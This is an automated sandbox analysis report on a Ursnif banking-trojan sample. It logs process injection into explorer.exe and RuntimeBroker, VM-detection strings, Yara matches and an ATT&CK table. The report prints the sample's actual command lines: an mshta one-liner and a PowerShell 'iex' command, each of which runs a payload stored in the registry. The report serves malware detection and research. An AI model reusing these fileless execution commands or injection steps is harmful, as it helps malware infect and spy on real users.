            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5040
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3816
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dllJump to dropped file
            Source: C:\Windows\System32\loaddll32.exe TID: 6784Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00458A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00443DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00456E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00461C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000021.00000000.416282562.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: RuntimeBroker.exe, 00000026.00000000.426595121.000001FC1125D000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000021.00000000.419810588.000000000F540000.00000004.00000001.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
            Source: explorer.exe, 00000021.00000000.416803055.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000021.00000000.411212416.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045735C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043040A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_004300B7 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045DA66 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Allocates memory in foreign processesShow sources
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: C:\Windows\System32\control.exe base: 1060000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writableShow sources
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.csJump to dropped file
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Source: C:\Windows\System32\control.exeThread created: unknown EIP: 736E1580
            Injects code into the Windows Explorer (explorer.exe)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 10AE000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 7FFB736E1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 1280000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 7FFB736E1580 value: 40
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\loaddll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\loaddll32.exeThread register set: target process: 4672
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3388
            Source: C:\Windows\explorer.exeThread register set: target process: 3668
            Source: C:\Windows\explorer.exeThread register set: target process: 4376
            Source: C:\Windows\explorer.exeThread register set: target process: 4588
            Source: C:\Windows\explorer.exeThread register set: target process: 5964
            Source: C:\Windows\System32\control.exeThread register set: target process: 5036
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6578712E0
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 1060000
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6578712E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 10AE000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 1280000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E02000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: explorer.exe, 00000021.00000000.400884078.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00454270 cpuid
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044190E CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737513E4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73751371 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1Windows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Valid Accounts1Valid Accounts1DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsCommand and Scripting Interpreter12Logon Script (Windows)Access Token Manipulation1Masquerading1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsPowerShell1Logon Script (Mac)Process Injection813Valid Accounts1NTDSSystem Information Discovery45Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
